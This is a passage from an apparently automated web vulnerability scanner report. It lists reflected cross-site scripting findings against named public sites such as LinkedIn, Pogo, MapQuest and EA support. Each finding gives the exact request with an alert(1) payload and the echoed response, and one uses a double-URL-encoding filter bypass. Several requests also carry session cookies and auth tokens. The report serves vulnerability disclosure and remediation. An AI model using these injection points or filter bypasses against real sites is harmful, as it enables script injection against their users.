GET /imag/exxonmobil.ico65346<script>alert(1)</script>2d65368a743 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:32:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 351
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /imag/exxonmobil.ico65346<script>alert(1)</script>2d65368a743 was not found on this server.</p>
...[SNIP]...

4.155. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload ab4ac<script>alert(1)</script>e2878ead204 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2Fab4ac<script>alert(1)</script>e2878ead204 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203; leo_auth_token="GST:ZqtY8b5aGbfesyoNwehM01mPF93sGu2Q_HWHmQOSqQfsGho0v3A8iI:1308921992:2370742abe0050dd8b7266d61a7db03ef730095e"; JSESSIONID="ajax:8160619548287194313"; lang="v=2&lang=en&c="; NSC_MC_QH_MFP=ffffffffaf19965545525d5f4f58455e445a4a42198c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:39 GMT
Content-Length: 210

IN.Tags.Share.handleCount({"count":0,"url":"http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/ab4ac<script>alert(1)</script>e2878ead204"});

4.156. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the sourceid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d was submitted in the sourceid parameter. This input was echoed as 12f2b</script><script>alert(1)</script>c356c9d923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the sourceid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12595


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b</script><script>alert(1)</script>c356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_g
...[SNIP]...

4.157. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/Scripts/AC_RunActiveContent.js

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df978</script><script>alert(1)</script>6085c15067d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

4.158. http://www.pogo.com/login/entry.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/entry.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a30</script><script>alert(1)</script>44a7311bc87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; s_pers=%20s_nr%3D1308922304648-New%7C1311514304648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 12481


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618939740244558";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252f
...[SNIP]...

4.159. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/media/Pogo_General_LP_2.swf

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30799</script><script>alert(1)</script>4c0d8e0492b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically this was done with client-side technologies such as Flash, which at one time could be made to issue a cross-domain request carrying attacker-chosen headers; if such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header specifically there is a simpler route: the browser fills it from the URL of the page the victim arrived from, so an attacker who lures the victim across from a page whose URL contains the payload controls the header. In practice this depends on the victim's browser, which may percent-encode characters such as <, > and " in the Referer and, under a restrictive referrer policy, may send only the origin or nothing at all. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal rather than merely HTML-encoded or backslash-escaped: every character outside [A-Za-z0-9] should be emitted as \xHH or \uHHHH. Escaping only the double quote is not enough, because the HTML parser terminates the script element at the first </script sequence it sees regardless of JavaScript quoting, so < and / must be encoded too. Alternatively, pass the value to the script through a data attribute or a JSON document with the same encoding applied, and read it from the DOM.

Request

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

4.160. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49471</script><script>alert(1)</script>881b68c5a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically this was done with client-side technologies such as Flash, which at one time could be made to issue a cross-domain request carrying attacker-chosen headers; if such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header specifically there is a simpler route: the browser fills it from the URL of the page the victim arrived from, so an attacker who lures the victim across from a page whose URL contains the payload controls the header. In practice this depends on the victim's browser, which may percent-encode characters such as <, > and " in the Referer and, under a restrictive referrer policy, may send only the origin or nothing at all. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal rather than merely HTML-encoded or backslash-escaped: every character outside [A-Za-z0-9] should be emitted as \xHH or \uHHHH. Escaping only the double quote is not enough, because the HTML parser terminates the script element at the first </script sequence it sees regardless of JavaScript quoting, so < and / must be encoded too. Alternatively, pass the value to the script through a data attribute or a JSON document with the same encoding applied, and read it from the DOM.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12270


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001";
s.channel="g
...[SNIP]...

4.161. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload e026d<script>alert(1)</script>0179e5f2a4f was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example script execution on any host that can set cookies for the same domain (a cookie set with a parent-domain attribute is sent to every subdomain), or a separate header-injection flaw on this host. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376e026d<script>alert(1)</script>0179e5f2a4f; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-13_15983333791308922273; expires=Wed, 22-Jun-2016 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15983333791308922273; expires=Fri, 24-Jun-2011 13:46:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376e026d<script>alert(1)</script>0179e5f2a4f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15983333791308922273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...

4.162. http://mapquest.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mapquest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb0f"><script>alert(1)</script>8a99c070059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection (here a 301 whose Location header also carries the payload unencoded). Browsers act on the Location header and do not render the body of such a response, so the injected markup is never parsed. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?2cb0f"><script>alert(1)</script>8a99c070059=1 HTTP/1.1
Host: mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 24 Jun 2011 14:15:18 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Fri, 24 Jun 2011 14:45:18 GMT
Content-length: 136
Content-type: text/html
Location: http://www.mapquest.com/?2cb0f"><script>alert(1)</script>8a99c070059=1

<html>
<body>
Page relocated <a href="http://www.mapquest.com/?2cb0f"><script>alert(1)</script>8a99c070059=1">here.</a>
</body>
</html>

4.163. http://support.ea.com/ [cp_session cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963d4"%3balert(1)//16be0394141 was submitted in the cp_session cookie. This input was echoed as 963d4";alert(1)//16be0394141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example script execution on any host that can set cookies for the same domain (a cookie set with a parent-domain attribute is sent to every subdomain), or a separate header-injection flaw on this host. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal rather than merely HTML-encoded or backslash-escaped: every character outside [A-Za-z0-9] should be emitted as \xHH or \uHHHH. Escaping only the double quote is not enough, because the HTML parser terminates the script element at the first </script sequence it sees regardless of JavaScript quoting, so < and / must be encoded too. Alternatively, pass the value to the script through a data attribute or a JSON document with the same encoding applied, and read it from the DOM.

Request

GET / HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; cp_session=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21963d4"%3balert(1)//16be0394141; evar1=Not%20Logged%20In; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A%252F%252Fwww.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA; s_ppv=7

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:31 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUd%7EwVrEDs3czCrHpI9GxvBIbHW22x4yA7XvD3kXIOgat8SuOUtH2xdNwkCkYLlWOBkqntoAHmB6IK58G1KzQVCqAgdeJVGcSvYWuSYq5iulSXh6t9zsILtyUH5_DuMKR8W%7EiS6qsSs6zkGBB6Hdk3TasMZWAcCABP; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:48:30 GMT
RNT-Time: D=208941 t=1308923311037929
RNT-Machine: 13
Vary: Accept-Encoding
Content-Length: 70174
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
lo2t8WgxRqvPN~F3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo~U~ihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz~Hv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI!963d4";alert(1)//16be0394141";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...

4.164. http://support.ea.com/app/answers/detail/a_id/3628 [cp_session cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/3628

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31232"%3balert(1)//5a7be544b54 was submitted in the cp_session cookie. This input was echoed as 31232";alert(1)//5a7be544b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example script execution on any host that can set cookies for the same domain (a cookie set with a parent-domain attribute is sent to every subdomain), or a separate header-injection flaw on this host. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

